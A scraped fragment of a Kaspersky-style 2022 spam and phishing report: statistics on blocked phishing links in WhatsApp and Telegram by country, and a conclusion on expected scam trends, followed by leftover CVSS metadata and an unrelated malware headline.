shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**\n\nThe largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place, where over the year, the Chat Protection component prevented 69,000 attempts to go to fraudulent resources from the messenger.\n\n_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_\n\nUnlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks could have exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.\n\n[![Dynamics of phishing activity on Telegram in 2022 \$weekly number of detected links shown\$](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)\n\n**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**\n\nIn Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.\n\n_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_\n\n## Conclusion\n\nTimes of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021, but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.\n\nRecently, we've seen an increase in targeted phishing attacks where scammers don't immediately move on to the phishing attack itself, but only after several introductory emails where there is active correspondence with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-02-16T08:00:07", "type": "securelist&qu

New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer

Description

Related